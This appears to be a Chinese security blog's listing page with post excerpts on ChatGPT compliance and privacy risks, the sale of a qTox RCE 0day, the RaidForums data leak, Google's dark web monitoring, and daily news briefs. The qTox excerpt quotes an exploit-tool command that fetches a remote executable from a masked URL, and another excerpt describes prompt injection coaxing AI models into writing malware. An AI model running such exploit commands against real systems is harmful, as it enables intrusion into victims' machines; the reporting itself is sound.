• ChatGPT的六大合规风险

    ChatGPT在全球科技行业掀起了生成式人工智能的“军备竞赛”,但是人们对生成式人工智能(AIGC)的合规风险普遍认识不足。 Gartner最近撰文指出,企业法务和合规负责人应该认知并解决企业面临的六种ChatGPT(包括其他基于大语言模型的生成式人工智能工具)合规风险,并开始建立护栏确保企业能安全且负责任地使用生成式人工智能工具。 “ChatGPT和其他大型语言模型工具容易产生多种风险,”Gartner法律与合规实践高级总监分析师冉弗里德曼(Ron Friedmann)指出:“法律和合规领导者应评估这些问题是否对其企业构成重大风险,以及在企业内部及其第三方/多方推广AI应用时企业内部需要采取哪些控制措施。否则,企业可能会面临法律、声誉和财务方面的严重后果。 法务和合规负责人应评估的六大ChatGPT风险包括(同样适用于其他大语言模型工具): 01 捏造的或失实信息 ChatGPT和其他大语言模型工具最常见的问题是倾向于提供不正确的(尽管表面上合理的)信息。 “ChatGPT也容易产生'幻觉',包括捏造答案,以及不存在的法律或科学引用,”弗里德曼说:“法律和合规领导者应该发布指导意见,要求员工在采信答案之前审查大语言模型工具生成内容是否准确、恰当和实用。” 02 数据隐私和机密性 法律和合规领导者应该意识到,输入到ChatGPT中的任何信息,如果未关闭聊天记录功能,都可能成为其训练数据集的一部分。 “提示词中使用的敏感、专有或机密信息可能会被用于回复企业外部用户的提问,”弗里德曼说:“法律和合规部门需要为ChatGPT的使用建立一个合规框架,并明确禁止将敏感的组织或个人数据输入公共大语言模型工具。 03 模型和输出偏差 尽管OpenAI努力减少ChatGPT中的偏见和歧视,但这些问题的案例已经频频发生,尽管OpenAI和其他公司正在积极努力将这些风险降至最低,但这个问题可能会永远存在。 “大语言模型不太可能完全消除偏见,因此法务和合规人员需要掌握管理人工智能偏见的法律,并确保合规性,”弗里德曼说:“这可能需要与专家合作,以确保人工智能生成可靠内容,并通过审计和技术功能进行数据质量控制。” 04 知识产权(IP)和版权风险 大语言模型工具,尤其是ChatGPT,训练时使用了大量互联网数据,其中可能包括受版权保护的材料。因此,ChatGPT之类的大语言模型输出的内容也有可能侵犯版权或知识产权保护。 “ChatGPT没有提供其内容生成的具体原理和机制,”弗里德曼说:“法律和合规领导者应该密切关注适用于ChatGPT(以及其他生成式人工智能工具)输出内容相关版权法规的任何变化,并要求用户仔细审查他们生成的内容,以确保不侵犯版权或知识产权。” 05 网络欺诈风险 不法分子已经在滥用ChatGPT来大规模生成虚假信息(例如,虚假评论)。 此外,集成或接入大语言模型模型(包括ChatGPT)的应用程序也容易受到提示注入攻击的影响。所谓提示注入攻击是一种黑客技术,攻击者使用恶意对抗性提示诱骗人工智能模型执行违反其内容审核规则的任务,例如编写恶意软件代码或开发网络钓鱼站点。 “法务和合规领导者应与网络安全风险负责人协调,探讨是否或何时就此问题向公司网络安全人员发布备忘录,”弗里德曼补充道:“他们还应该对信息来源进行尽职调查和审计,以验证信息的质量。 06 消费者保护风险 如果企业的应用(例如客服聊天机器人)未能向消费者披露是否使用了生成式人工智能技术(例如ChatGPT),企业将面临失去客户信任的风险,甚至可能遭到起诉。 例如,美国加利福尼亚州的聊天机器人法律要求,在某些消费者互动中,企业必须清晰、明确地告知消费者正在与机器人进行交流。 法务和合规负责人需要确保企业的大语言模型应用(例如ChatGPT)符合所在司法辖区内的所有相关法规和法律,并已向客户进行了适当的披露。   ...

    2023-06-01 值得一看 4
  • 暗网上流行的聊天软件qTox据称存在远程代码执行漏洞,该漏洞售价20个比特币

    “Kirin博客”曾经科普过Tox ,Tox是一个免费的点对点即时消息传递和视频电话网络协议,可实现加密数据交换。该项目的目标是创建一个安全且易于使用的通信平台。Tox与Tor的结合,可以实现在暗网下完全匿名点对点通信。其中,qTox是使用比较多的客户端。 近期,在流行的暗网犯罪论坛XSS.is中,高级用户nightly(注册时间为2019年4月10日)宣布以20BTC(52.95万美元)的价格出售暗网上流行的聊天软件qTox最新版本(1.17.6)的漏洞,该漏洞为远程代码执行漏洞。 为了证明qTox确实存在远程代码执行(RCE)类型的零日漏洞,作者上传并引用了一个包含访问并执行的详细操作信息的GIF图片。该图片向大家展示的是,对于实施攻击而言,用户接受发送给他的通信请求就足够了。 nightly写道:“一方面,担保人可以由我承担费用,无论谁有定金——我把它扔出去,转让来源并帮助购买后如何使用它。我不会完成任何事情,因为我的脑袋被这些狗屎代码烧得沸腾了。这已经是你的编码器的任务了。” 根据该贴文,影响以下版本: You are using qTox version v1.17.6. toxcore version: 0.2.13 Commit hash: 54345d1085628950af4176e6b4873513db0de4f3 Qt version: 5.7.1 信息安全市场的一些主要参与者几乎立即对此做出了反应。特别是,vx-underground在他们的Telegram频道上写道,该漏洞“将允许攻击地球上几乎所有的勒索软件团伙与威胁行为者。” > A TOX 1.17.6 (current version) RCE 0day is for sale. > > It would give nerds the ability to pwn literally every ransomware group, and major Threat Actor, on the planet. All it requests is sending a friend request, and the other person accepting it. > > It is being sold for $500,000 > > — vx-underground (@vxunderground) [May 25, 2023](https://twitter.com/vxunderground/status/1661789069670780934?ref_src=twsrc%5Etfw) 5月25-26日晚上,跟帖中出现漏洞已售出的消息,没有提供买家信息。 值得注意的是,远程代码执行(RCE)漏洞允许远程代码注入服务器脚本,这在所有可能的情况下都会导致资源或应用程序遭到黑客攻击。因此,攻击者可以快速控制并访问受害者的设备。 运行示例: ./detox “https://***.zip/test.exe” 与此同时,勒索软件团伙Lockbit宣布终止使用Tox作为与其联系的方式,另外,XSS.is管理员也从他们简介的信息中删除了Tox通信方法的hash。 Lockbit勒索软件团伙管理人员说:“现在我要如何结交新朋友?不要在 qTox 上给我发消息,我只有老朋友)))” XSS.is管理员表示,删除自己的tox的原因是他们的客户存在很多问题,而且没有及时更新,他说:“我对这个漏洞了解不多,但它与qtox有关,不是tox的核心,他说我们正在寻找替代方法或相同的方法。”我们将返回tox,Telegram绝对不是一个替代方案。...

    2023-06-01 值得一看 3
  • 5月31日新闻早讯,每天60秒读懂世界

    5月31日,农历润四月十三,星期三 在这里,每天60秒读懂世界 1、30日,神舟十六号成功发射,3名航天员顺利进驻中国空间站,美媒点赞:中国航天计划再迈新台阶; 2、两部门:鼓励各类全日制高校学生参加基本医保;上海:支持民间投资与国有资本联合参与重大项目投资建设; 3、2023新一线城市名单官宣:呈现"南强北弱"格局,成都、重庆、杭州、武汉、苏州、西安、南京、长沙、天津、郑州、东莞、青岛、昆明、宁波、合肥等15座城市入选; 4、河南遭遇10多年来最严重"烂场雨",致多地待收割小麦发霉发芽。河南:多举措抢收夏粮,紧急下拨2亿元专项用于小麦烘干;河南商丘一县法院工作人员严重违法被查:初中学历未满19岁入职,官方:是临时打字员; 5、上海热盘云锦东方:暂停销售摇号,因摇号选房时间暂不确定,如需退出本次认购活动的可退还认购金。该盘曾被称为"买到躺赚2000万"; 6、广东东莞虎门镇一社区干部薪酬表引关注,"平均月薪2万元",社区回应:只算中等水平,附近社区更高; 7、吴谢宇弑母案二审维持死刑原判:作案时具有完全的辨认和控制能力。旁听人员:他听到判决后人很呆,没说一句话; 8、浙江自然资源厅一处长在地铁猥亵他人被拘12日!官方:已免职,并调离公务员队伍; 9、快播公司宣告破产,公司已注销,此前因版权侵权、传播淫秽信息等被查封,公司创始人王欣曾获刑入狱,2018年出狱; 10、美国国防部:中方拒绝了中美防长在香格里拉对话会会面的请求。外交部:原因美方是清楚的; 11、外媒:埃尔多安在确认胜选的次日就找美国买F-16战机,拜登:你先同意瑞典加入北约; 12、外媒:科索沃局势升级,科索沃塞族抗议者与北约部队当地29日发生暴力冲突,已致25名北约士兵和52名塞族人受伤,北约向科索沃北部增兵,塞尔维亚仍不让步。武契奇:已将塞军的战斗警报设为最高级别,有人要当下一个泽连斯基; 13、马来西亚当地29日扣押了一艘中国船只,称其涉嫌非法打捞二战英国名舰残骸,英国:深感痛心 ,相关人士:或是中国注册的船只,但租给了马来西亚一家船舶公司; 14、外媒:马斯克私人飞机30日降落北京,将会见中国高级官员并参观特斯拉的上海工厂,外交部:欢迎各国工商界人士访华; 15、30日,俄首都莫斯科市区遭无人机袭击,多个建筑物受损,暂无人伤亡,无人机被击落爆炸,俄外交部:保留采取最严厉回应措施的权利;乌防长:不会攻击俄领土,争取建立正常关系;俄国防部:俄军对乌数个决策中心实施导弹打击;俄媒:俄内务部通缉乌军总司令扎卢日内;捷克军队高官:俄与北约爆发战争并非不可能发生; 【微语】在喜欢的状态里生活,做你自己就好,生活不在富足而在于满足,保持对生活的热爱,便是治愈生活的良药,眼下即是最真实的生活。...

    2023-05-31 值得一看 6
  • 被美国司法部查封一年后,RaidForums的用户数据被泄露在Exposed论坛上

    在美国司法部查封这个臭名昭著的网络犯罪论坛一年后,包含近50万RaidForums用户详细信息的数据库在网上泄露。 泄露的数据库发布在Exposed论坛上,安全研究人员将其描述为一个新兴的论坛,“希望填补最近BreachForums关闭留下的空白”。 “Kirin博客”访问了这个最新的数据泄露论坛,也是使用MyBB程序搭建,与RaidForums以及BreachForums看上去很相像。该论坛的公告称,Exposed论坛的暗网镜像网站将很快推出。 从RaidForums到BreachForums,最后到Exposed Forums RaidForums于2015年推出,曾经是一个广受欢迎的平台,发展成为世界上最大的黑客论坛之一。网络犯罪分子主要使用它来买卖被盗的数据库。其中包括加密货币钱包服务Gatehub的超过一百万个密码,以及数百万个被盗的T-Mobile客户帐户。据报道,Lapsus$黑客组织也使用了该黑客论坛。 美国司法部宣布,作为国际执法行动的一部分,它已于2022年4月没收了RaidForums的网站和基础设施。RaidForums的管理员,被称为“Omnipotent”,和他的两个同伙也被逮捕。检察官说,在该论坛被查封之前,有数百个包含超过100亿条个人记录的被盗数据的数据库被出售。 RaidForums被摧毁后,黑客社区聚集在一个名为BreachForums的新论坛中继续他们的非法活动,BreachForums服务于相同的目的和受众。然而,FBI在2023年3月逮捕了BreachForums的创始人“pompompurin”。“Pompompurin”被捕几天后,该论坛的共同管理员“Baphomet”担心执法部门可能会访问BreachForums的服务器,因此宣布他们永久关闭该论坛。 为了填补BreachForums留下的市场空白,最近推出了一个名为Exposed的新黑客论坛,并迅速受到欢迎。 Exposed论坛的管理员“Impotent”泄漏RaidForums用户的数据库 2023年5月29日,Exposed论坛的管理员“Impotent”公开了RaidForums成员数据库,其中包括47.8万名用户的详细信息,包括他们的用户名、电子邮件地址、哈希密码和注册日期。这些数据现在可供其他威胁参与者、研究人员和执法部门使用。 此外,他们已将此信息作为公告发布在其网站上。 泄露的数据已经可以下载,包括一个包含RaidForums 成员注册信息的SQL文件。这些数据源自RaidForums论坛使用的软件程序(MyBB)中的“mybb_users”表,该表用于存储用户名、电子邮件地址、哈希密码、注册日期和其他相关论坛相关信息等详细信息。 在泄露的数据表中,有478870名在2015年3月20日至2020年9月24日期间注册的RaidForums会员的信息,这表明该数据库在此期间被转储。 Exposed论坛的管理员在帖子中说:“所有在raidforums上的用户可能都被泄露了。”RaidForums在去年关闭时拥有大约55万名用户。 管理员补充说,部分RaidForums用户的详细信息已从数据库中删除,但尚不清楚有多少或背后的原因。 数据库中的大量账户包含已知的注册信息这一事实支持了泄露表的真实性。Exposed论坛的一些成员也确认了他们的信息存在于该MySQL数据表中。 在RaidForums被美国当局查封后,暴露的数据可能已经掌握在执法部门手中,但这些数据对安全研究人员来说仍然很有价值。他们经常利用此类信息来构建威胁参与者的档案,并可能发现与其他恶意活动的联系。 黑客群里在热议,认为Exposed论坛可能是FBI的蜜罐 Telegram中的多个黑客群组中,针对RaidForums数据泄露进行了激烈讨论。 从RaidForums到BreachForums,都是基于PHP论坛程序MyBB搭建,有黑客怀疑,是否MyBB或者其插件存在未公开的0day漏洞,并表示,如果存在,Exposed论坛可能就是下一个被查封的论坛。 还有多名黑客怀疑,Exposed论坛极可能是FBI的蜜罐,因为联邦调查局有该数据库。...

    2023-05-31 值得一看 9
  • ChatGPT数据隐私解密

    ChatGPT从发布至今曾闹出了不少隐私安全问题,先是意大利暂时封杀ChatGPT,限制OpenAI处理本国用户信息。接着,据韩国媒体报道,三星在使用ChatGPT不到20天,便曝出机密资料外泄。ChatGPT是否会保存用户数据或利用用户数据,并没有人专门分析过,笔者接下来将就这一问题逐一进行解密。 数据授权 根据OpenAI的公告,从2023年4月25日起,用户可以自由禁用对话记录,这样对话就不会再出现在侧边栏上。 一句话总结OpenAI的隐私策略就是:此前,用户只能按需定期清除聊天记录,但任何对话OpenAI仍可用于模型训练微调。截至目前为止,如果对话记录被禁用,对话只会保留30天,然后OpenAI会永久删除它们。 要禁用ChatGPT的对话记录非常简单,访问Web界面中的设置,导航至主页的左下部分,将弹出一个小窗口: 切至”Data controls“,我们可以看到这一项下面的一行小字,你的聊天记录将会被允许ChatGPT进行模型训练。 数据导出 OpenAI在ChatGPT的设置中还添加了一个新功能:一个导出选项,用于获取您的ChatGPT数据,并找出ChatGPT存储了哪些关于您的信息。 确认导出操作后,在邮箱中收到如下的内容: 我们会发现用户所有的数据实际上都存储在微软的Azure Blob Storage里。 数据文件 整个用户对话记录数据分为5个文件: chat.html (对话记录网页) conversations.json (对话记录数据) message_feedback.json (用户质量反馈数据,用于强化学习) model_comparisons.json (用户点击重新生成答案的二次对话数据) user.json (用户信息数据) 通过JSON文件分析,我们还发现了一些有意思的技术细节: ChatGPT的对话和OpenAI官方API的定义一致,也分为system、user和assistant三个角色。并且每次对话会和上一次user提问保持一级父子关系,估计官方是以这种user提问链的方式来维持对话记忆。   数据隐私 通过导出的对话记录,可以确定OpenAI保留了关于用户与ChatGPT交互的所有信息! 值得注意的是,如果用户不关闭”对话记录和导出个人数据“功能,OpenAI就默认用户授权可以使用用户对话记录数据训练模型。这是一个大坑,要便利就没有隐私。 OpenAI这个对话记录数据导出功能明显是遵循了欧盟通用数据保护条例(GDPR) ,因为GDPR明确定义了厂商处理用户数据的义务,用户需要可以自由访问受其个人约束的所有用户数据,这也是就是为什么谷歌等互联网厂商在收集个人信息时有义务随时向用户提供他们从哪里获得数据的原因。 用户隐私和商业利益是AI厂商目前的一个矛盾难题。但是,透明度仍然是厂商和用户之间建立信任和确保所有人安全地使用AI的关键!      ...

    2023-05-31 值得一看 5
  • 5月30日新闻早讯,每天60秒读懂世界

    5月30日,农历润四月十二,星期二 在这里,每天60秒读懂世界 1、全国多地高温预警:部分地区已超40摄氏度。中国气象局:未来三天,华南、江南、贵州、云南、四川等多地有35℃以上高温天气,部分地区可达37~39℃,局地40℃; 2、民政部:要推动社区充分挖掘社区服务需求,开发社区服务岗位,鼓励和支持高校毕业生在社区内就业; 3、官方:我国载人月球探测工程登月阶段任务已启动实施,计划在2030年前实现中国人首次登陆月球;神舟十六号于30日9时31分发射,神十六航天员乘组公布:景海鹏、朱杨柱、桂海潮。 4、教育部:研究推动京津优质中小学基础教育资源同河北共享;应急管理部:拟向教育部申报设立应急管理大学,办学地点在廊坊; 5、北京等地开始接种国内首款四价新冠疫苗,针对四种变异株,由神州细胞公司研发生产; 6、上海:6月1日起试点婚姻登记跨省通办,一方持上海居住证,就可办理; 7、农行:6月30日后将陆续对符合长期不动特征的存折账户进行销户处理;恒大地产:截至4月末涉及未能清偿的到期债务累计约2724.79亿元; 8、湖北潜江市一食品公司发生氮气窒息事故,虾仁速冻车间1死18伤;28日早,安徽省安庆桐城一加工厂发生有限空间事故,致3死1伤,安徽省安委会挂牌督办; 9、河南:十大举措保障夏粮抢收,最大限度减少小麦霉变,优先保住小麦种子、落实跨区机收免费通行; 10、台军称山东舰航母编队再穿台海,专家:过航已常态化,无须对号入座; 11、土耳其20年"掌舵人"埃尔多安赢得史上最艰难选举,再次当选总统,拜登、苏纳克、普京、泽连斯基等祝贺; 12、美媒称中方要求"允许俄占据现在占领的乌部分领土",外交部回应:没有这回事,请以中方发布的消息稿为准; 13、美媒:当地28日,美国艾奥瓦州达文波特市一六层公寓楼部分坍塌致多人受伤,救援人员正搜寻失踪人员; 14、日本:接到朝方通报,朝鲜将在5月31日至6月11日间发射军事侦察卫星,谴责朝鲜违反安理会决议,要求朝方"保持克制,不要发射"。韩国警告朝鲜不要发射;岸田文雄希望为就解决"朝鲜绑架日本人"问题,举行日朝首脑会谈,朝方:若立场不变谈判是"浪费时间"; 15、俄媒:普京29日签令废止《欧洲常规武装力量条约》。并批准了俄罗斯与吉尔吉斯斯坦建立联合区域防空系统的协议;乌军总司令:当地28日夜晚至29日凌晨,俄军向乌克兰发射了至少40枚导弹,出动约35架无人机,其中至少37枚导弹和29架无人机被乌军击落。基辅市中心接连传出爆炸声:燃烧导弹残骸坠落,民众地铁中避难; 【微语】每个人都想,苦了,有人疼。久了,有人忆。远了,有人牵。但现实告诉我们,生活,要自己忙。苦累,要自己扛。...

    2023-05-30 值得一看 8
  • 5月14日新闻早讯,每天60秒读懂世界

    5月14日,农历润三月二十五号,星期日 在这里,每天60秒读懂世界 1、广州市住建局:严查室内违法装修,发挥物业"吹哨人"作用; 2、12日,湖南益阳一小区发生防护窗脱落事件,两儿童从5楼坠亡,知情者:事发时大人在家做饭。家人:2人加起来不超过50斤,怀疑防护窗没焊好;13日,四川一男子装防盗网时不幸从6楼坠亡,警方:安装作业时未系安全绳; 3、12日晚,扬州宝应县经济开发区一小区发生命案,知情人:九旬老人吵架捅杀八旬老伴后自己报警。初步了解系家庭矛盾导致; 4、13日下午,山西吕梁突发车祸多人被撞致多人伤亡,目击者:事发闹市区,人流量大。官方:嫌疑人因情感纠纷撞人已被控制。医院:已收治15名伤者,其中有伤者已去世; 5、台媒:郭台铭在金门发表和平宣言,称他参选后"没有台湾独立的问题",主张以金门作为两岸新的常设谈判地点。国民党将于5月17日敲定最终参选人,民调显示,42.1%支持侯友宜,29.4%支持郭台铭; 6、日媒:白宫发言人称拜登仍将赴日参加G7峰会,预计17日启程。此前拜登曾暗示如债务上限谈判没进展,或会取消此次行程; 7、巴以冲突持续升级:当地12日,以色列军空袭巴勒斯坦加沙,造成4死十余伤。自5月9日来,以色列持续的空袭,已致至少33人死亡; 8、五角大楼警告:继续拖欠债务危及美军工资,将对中国有利,必然会给他们"壮胆"; 9、当地12日,欧盟外长非正式会议在瑞典首都举行,会中讨论了中欧关系,立陶宛外长"碰瓷"台湾问题,匈牙利外长表态:不希望欧盟成为反华集团; 10、美媒:62名共和党人联名致信拜登,要求他接受认知测试或退出2024大选; 11、俄称乌使用由英国提供的"风暴阴影"巡航导弹空袭卢甘斯克,击中了已经停产的两处民营工厂区域,发射导弹的战机被击落; 12、外媒:当地13日,泽连斯基抵达意大利罗马,与教皇方济各和意大利领导人会面; 13、俄总理签令:批准关于俄通过远东路线向中国输送天然气的协议; 14、当地13日,乌外长与美国务卿通话,讨论乌军反攻准备情况,并索要F-16战机。德国将再给乌27亿欧元武器援助; 15、俄媒:当地12日,一架米-8直升机在俄罗斯布良斯克州坠毁,致2人死亡,原因是发动机起火。同日,俄一架米-28直升机在克里米亚坠毁,2名飞行员死亡,原因是设备故障; 【微语】不必满足所有人的期待,温柔勇敢,直面内心,时刻觉醒,日子再忙也不能失去追求美好生活的能力。...

    2023-05-15 值得一看 34
  • 5月12日新闻早讯,每天60秒读懂世界

    5月12日,农历润三月二十三号,星期五 在这里,每天60秒读懂世界 1、中央气象台:至13日,广东、广西、海南岛、云南等地的部分地区有中到大雨,局地有暴雨或大暴雨。国家防总:启动防汛四级应急响应; 2、国家移民管理局:5月15日起出入境证件全国通办,全面恢复口岸快捷通关; 3、2023亚洲杯抽签结果出炉:中国队与卡塔尔、塔吉克斯坦和黎巴嫩同组,媒体人:国足抽到了上上签,小组出线问题不大,打好了上限高; 4、广东中山一家五口驾车坠河不幸遇难,官方:遗体已全部打捞上岸;河南三门峡一煤矿发生火情致5人失联,市应急局:仍在救援中;重庆姐弟坠亡案二审宣判:逐条评判15条上诉理由及辩护意见,均不予采纳,对张波、叶诚尘维持死刑原判; 5、长沙霸占车位事件落幕:直播间"对话"次日,车主诚恳致歉,双方和解,栏杆拆除。车位主人:从来没想到过她会被网暴,这不是目的; 6、台媒:陈水扁之子陈致中因涉入洗钱案被判刑一年,11日入监服刑; 7、英国第一批"三亲"(1个爸爸2个妈)婴儿诞生:有3人DNA,可防线粒体病遗传。反对者:这是一种变相的基因改造,不符合医学伦理;世卫组织:猴痘疫情不再构成"国际关注的突发公共卫生事件"; 8、外媒:土耳其大选14日举行,民调显示,反对派领导人凯末尔·科勒齐达奥卢支持率略微领先埃尔多安,埃尔多安执政生涯或将终结; 9、外媒:当地11日,意大利城市米兰发生爆炸,数辆汽车起火,爆炸可能来自于一辆小型货车,事件已致4人受伤; 10、外媒:G7峰会或将要求中国"遵守国际规则"。外交部:先把拖欠多年的联合国会费补上; 11、当地11日,巴基斯坦最高法院裁定逮捕前总理伊姆兰·汗系非法,各地抗议活动已致10死1750伤; 12、外媒:尹锡悦称韩国一年内可拥核,军事专家:决定权不在他;11日晚,琉球群岛发生5.9级地震,震源深度10千米; 13、波兰决定重新命名俄罗斯飞地"加里宁格勒",改回德国名"柯尼斯堡",俄方:波兰做出了疯狂的举动;瑞士政府:俄罗斯央行有近74亿瑞郎(约合83亿美元)资产位于瑞士,已无法动用; 14、拜登:如果美国债务违约,全世界都会陷入麻烦之中;英国央行宣布加息25个基点,上调基准利率至4.5%,这也是自2021年12月以来连续第12次加息; 15、俄少将:红场阅兵当天,乌克兰试图出动无人机对莫斯科进行大约百次袭击,其中一些无人机被俄方摧毁;英国确认向乌提供远程巡航导弹,俄:将作出同等回应; 【微语】生活跌跌撞撞,季节来来往往,身边人来人往,希望我们还是我们。...

    2023-05-12 值得一看 36
  • 谷歌正在为所有美国Gmail用户带来暗网监控,未来将覆盖国际用户

    谷歌Google 公司今天宣布,美国的所有Gmail用户将很快能够使用其专业提供的暗网报告安全功能,来发现他们的电子邮件地址是否在暗网上被泄露。 这家搜索巨头还在谷歌I/O年度开发者大会上表示,该功能将在未来几周内推出,以后该功能的使用权限也将扩展到选定的国际市场。 谷歌的暗网报告工具并不是一项新功能 由于您可能注册的服务和平台的数据泄露,电子邮件地址等个人信息可能会进入暗网。然后,这些信息可以被网络犯罪分子以各种方式出售和使用,包括身份盗用、银行欺诈和网络钓鱼诈骗。 谷歌的暗网报告工具并不是一项新功能,但它以前只适用于订阅该公司扩展的云存储平台Google One的美国用户。谷歌还表示,该工具最终将可用于“选定的国际市场”,但没有具体说明哪些国家可以获得访问权限。 一旦启用该功能,它将允许Gmail用户在暗网上扫描他们的电子邮件地址,并根据谷歌提供的指导采取行动保护他们的数据。 例如,他们会被建议开启两步验证,以保护他们的谷歌账户免遭劫持企图。 “以前仅适用于美国的Google One订阅者,我们将在接下来的几周内扩大对暗网报告的访问,因此在美国拥有Gmail帐户的任何人都可以运行扫描,以查看您的Gmail地址是否出现在暗网上,并获得关于采取什么行动来保护自己的指导。”谷歌核心服务高级副总裁Jen Fitzpatrick说。 谷歌还将定期通知Gmail用户,检查他们的电子邮件是否与最终出现在地下网络犯罪论坛上的任何数据泄露有关。 暗网报告于2023年3月开始向美国所有Google One计划的成员推出,提供一种简单的方式,当他们的个人信息在暗网上被发现时,可以得到通知。 “Google One的暗网报告可帮助您在暗网上扫描您的个人信息——例如您的姓名、地址、电子邮件、电话号码和社会安全号码——并在找到时通知您。”Google One产品管理总监Esteban Kozak在3月首次宣布该功能时说。 如何启用暗网监控功能 GoogleOne订阅者可以通过在进入Google One并单击“暗网报告”下的“设置>开始监控”后,使用他们的信息创建监控配置文件来启用它。 谷歌公司表示,所有添加到配置文件的个人信息都可以从监控配置文件中删除,或者通过在暗网报告设置中删除配置文件来进行删除。 Kozak补充说,Google One用户还会看到结果,并“可能在这些数据泄露中找到的其他相关信息”。 “如果在暗网上找到任何匹配的信息,我们会通知您,并提供有关如何保护该信息的指导。”Kozak说。 谷歌将推出一系列新功能保护用户安全 在今天的谷歌I/O大会上,谷歌还宣布升级了安全浏览服务,以在Chrome和Android上捕获和阻止25%以上的网络钓鱼尝试。 该公司还在Google Drive中添加了新的垃圾邮件视图,旨在帮助用户控制他们想要指定为垃圾邮件的内容。Drive会自动将明显的违规者分类到垃圾邮件视图中,以防止用户意外访问任何“不需要或滥用的内容”,谷歌声称新视图使分离和审查文件变得更加容易。 删除Google地图中的搜索历史记录也变得更加容易。您已经可以通过帐户设置中的“Web & App Activity”选项卡清除您的搜索历史记录,但现在,谷歌添加了直接在地图中单击即可删除最近搜索的功能。 谷歌还向其他平台和组织提供安全服务 Google的内容安全API被Facebook和Yubo等公司用来识别和删除网络中的儿童性虐待材料(CSAM),今天正在扩展到包括视频内容。 这是以前由CSAI Match管理的内容,CSAI Match是YouTube用于检测在线视频中的CSAM的专有技术。谷歌没有提及API的新视频功能是否正在取代CSAI Match或这两种服务有何不同。...

    2023-05-12 值得一看 38
  • 韩国警方称暗网网址超过76万个,将联合FBI共同打击

    韩国警方已将暗网追踪、虚拟资产分析和DDoS攻击列为警方必须紧急解决的“网络恐怖主义调查的三大核心任务”。 虚拟资产越来越受欢迎,因此暗网成为犯罪的匿名支付手段。 为此,韩国警察厅称,已决定成立一个应对网络犯罪平台的工作组,三个分部门将开展三项主要任务,并已决定成立并运营TF网络犯罪平台应对特别工作组(Special Task Force),研发整治暗网、虚拟货币分析、DDoS(Distributed Denial-of-Service,分布式拒绝服务)攻击等的策略和技术手段。。 这支部队将致力于研究响应技术和调查网络恐怖主义追踪技术。TF由“三部分”组成,主题如下: 暗网追踪 加密货币分析 DDoS攻击监控 它将用于研究响应技术和调查技术,以追踪网络恐怖袭击的核心。 韩国警方解释说,这项技术作为一种匿名网络和支付手段,对未来的安全构成重大威胁,因为它被滥用于网络恐怖主义犯罪和网络犯罪分子的一般犯罪活动中。 据韩国警方透露,暗网网址已由2018年的9.24万个增至去年的76万个。暗网隐藏用户IP地址,常被用于毒品交易,亦被用于儿童性剥削制品的交易。警方表示,追踪上述网络犯罪需要相当高水准的专业知识、技术。 暗网是一个在线空间,只能通过安装特定程序作为匿名网络服务来访问。它具有不暴露服务器IP地址和访问者的特点。为此,由于勒索软件、贩毒、儿童性剥削和非法拍摄等恶意程序的传播,全球用户数量持续增加。 虚拟资产已成为暗网匿名支付的重要货币。他们被滥用于买卖各种非法车辆或收取勒索软件等犯罪所得的款项。DDoS攻击通过同时向多个系统发送大量数据来中断网站与网络服务。 据韩联社报导,该工作组由具备IT相关专业的1名调查官和多名警官组成,调查官从科学技术情报通信部和韩国信息技术研究院合办的信息技术集中教育的课程学员中,选拔曾任职于民间网络安全企业的优秀警官。 该工作组将与美国联邦调查局(FBI)、韩国互联网振兴院等国内外执法机构、网络安全研究机构建立合作关系。...

    2023-05-11 值得一看 52
  • 5月11日新闻早讯,每天60秒读懂世界

    5月11日,农历润三月二十二号,星期四 在这里,每天60秒读懂世界 1、教育部:各高校要大幅扩大科研助理岗位,吸纳应届毕业生就业; 2、福建宁德:全面放宽限购,在中心城区买商品住房不受户籍和套数限制;石家庄:多子女家庭租房每年提取公积金额度提高至18000元; 3、上海:放开参保人员在定点零售药店非处方药购买限制,包括种类、数量和频次等;合肥房管局紧急通知:严禁在装修过程中破坏房屋主体、承重结构; 4、淘宝天猫618将于5月26日开启:戴珊称今年是历史级巨大投入; 5、天舟六号货运飞船发射任务取得圆满成功:能载货7.4吨,是现役运力世界第一; 6、南京一家烤肉店内3男子轮番搭讪邻桌女性,店员出面制止后被围殴,警方:3人被刑拘; 7、10日上午,山西吕梁孝义市发生一起因偷排不明液体致3人中毒死亡案件,2名重点嫌疑人被控制;福建宁德一男子诊所内行凶致2人死亡,死者为60余岁医生和其40余岁儿子,嫌犯已被抓获; 8、台媒:10日中午,台湾一约3层楼高的吊车吊臂砸向行驶中列车,插入车厢致1死8伤;美国国务卿布林肯连续三年鼓噪世卫邀请台湾地区参与世卫大会,外交部:坚决反对; 9、韩媒:最新民调显示,尹锡悦就职一年好评率仅剩33%,排在韩历任总统倒数第二。过半韩国人主张日本先就历史问题道歉,再改善关系; 10、外媒:巴基斯坦前总理伊姆兰·汗被捕后,引发全国范围内暴力抗议,目前已有人员伤亡,美英呼吁巴基斯坦遵循"法治"; 11、外媒:为解决美国债务上限问题,拜登或取消日本G7峰会之行。白宫:债务违约是给俄中"送礼",将导致美元计价市场出现波动。美专家:美国解决不了债务问题,黄金将成唯一储备资产; 12、当地9日,特朗普被裁定性侵和诽谤指控成立,被判赔偿美国女作家500万美元,特朗普痛批该判定:耻辱,将上诉; 13、当地10日,俄罗斯、土耳其、叙利亚和伊朗四国外长就全面修复土叙关系等问题举行会谈;白俄总统因健康原因紧急离开莫斯科,返回途中有救护车陪同,外媒开始揣测其健康状况; 14、外媒:意大利总理称或考虑退出共建“一带一路”合作。外交部回应:中意应进一步挖掘合作潜力; 15、普京签署法令:征召在预备役人员进行2023年度的军事集训;英媒:英国拟把瓦格纳集团列为"恐怖组织",以此加大对俄施加的压力;外媒:美官员称英国计划向乌提供射程300公里的远程导弹,让拜登政府"松了口气"; 【微语】生活本不易,一定要站在自己的热爱里,找寻属于自己的那缕光。...

    2023-05-11 值得一看 31
  • 暗网——充斥着数据交易,骗子赚的盆满钵满

